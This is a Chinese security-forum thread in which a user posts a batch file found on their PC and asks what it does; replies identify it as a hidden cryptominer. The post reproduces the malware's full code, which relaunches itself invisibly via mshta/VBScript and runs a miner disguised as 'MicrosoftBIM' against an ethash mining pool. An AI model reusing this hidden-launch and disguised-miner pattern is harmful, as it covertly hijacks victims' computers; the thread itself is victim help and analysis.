吾爱破解 - LCG - LSG |安卓破解|病毒分析|www.52pojie.cn

 找回密码
 注册[Register]

QQ登录

只需一步,快速开始

查看: 4851|回复: 42
收起左侧

电脑光标总不停的闪烁,原来是这个批处理再作怪,大家帮忙分享下啥意思

  [复制链接]
gzh820101 发表于 2022-3-6 08:52
使用论坛附件上传样本压缩包时必须使用压缩密码保护,压缩密码:52pojie,否则会导致论坛被杀毒软件等误报,论坛有权随时删除相关附件和帖子!
病毒分析分区附件样本、网址谨慎下载点击,可能对计算机产生破坏,仅供安全人员在法律允许范围内研究,禁止非法用途!
禁止求非法渗透测试、非法网络攻击、获取隐私等违法内容,即使对方是非法内容,也应向警方求助!
本帖最后由 gzh820101 于 2022-3-6 10:24 编辑

电脑光标总不停的闪烁,原来是这个批处理再作怪,大家帮忙分享下啥意思
windows批出来,在电脑c盘C:\ProgramData/MicrosoftBIM.bat
代码如下:
@echo off

if "%1"=="h" goto begin

start mshta vbscript:createobject("wscript.shell").run("""%~nx0"" h",0)(window.close)&&exit

:begin
MicrosoftBIM -a ethash -o cn.sparkpool.com:3333 -u sp_fuzor.ddds -log

本人小白,完全看不懂这个代码是干啥的,我电脑是不是被黑客控制了,我把这个批处理删除后,光标就不闪烁了
-------------------------------------------------------
现在基本确认是挖矿的,我就比较好奇,现在病毒都是bat的吗,那么他是怎么到我电脑的,是不是我电脑还有别的病毒埋伏,他能操作我电脑,自己在我电脑新建了这个代码,昨天发现这个的时候,当天没有打开过网页,还是查询他的时候开的网页,追溯到前天4号,从河东下载站下载过一个软件,浏览记录如下:
QQ截图20220306102200.png
不知道是不是因为下载他的原因

免费评分

参与人数 3吾爱币 +3 热心值 +2 收起 理由
Tenfdj + 1 + 1 我很赞同!
唐小样儿 + 1 + 1 我很赞同!
夫子点灯 + 1 谢谢@Thanks!

查看全部评分

发帖前要善用论坛搜索功能,那里可能会有你要找的答案或者已经有人发布过相同内容了,请勿重复发帖。

mlwnl 发表于 2022-3-6 09:47
请问楼主你是怎么知道是这个批处理在作怪的?我认为,光凭你能发现这个批处理,你就不是小白。
CC1888158 发表于 2022-3-6 08:59
zhixin302 发表于 2022-3-6 09:05
搜索得知:
ethash ,是目前以太坊主网(Homestead版本)的POW共识算法
sparkpool ,星火矿池(关闭)(SparkPool)是一家区块链相关网站

估计是被偷偷挖矿了
sjminh 发表于 2022-3-6 09:09
搜索sparkpool,是挖矿的
zhxwayne 发表于 2022-3-6 09:19
各种疑难杂症!
Ω分子 发表于 2022-3-6 09:21
cn.sparkpool……一眼矿池
唐小样儿 发表于 2022-3-6 09:37
大概是中毒了把
素颜朝天 发表于 2022-3-6 10:02
怎么发现是这个批处理在作怪的
songyuxuan 发表于 2022-3-6 10:10
搜索其中关键字,挖矿嫌疑很大
您需要登录后才可以回帖 登录 | 注册[Register]

本版积分规则 警告:本版块禁止灌水或回复与主题无关内容,违者重罚!

快速回复 收藏帖子 返回列表 搜索

RSS订阅|小黑屋|处罚记录|联系我们|吾爱破解 - LCG - LSG ( 京ICP备16042023号 | 京公网安备 11010502030087号 )

GMT+8, 2024-4-19 22:08

Powered by Discuz!

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表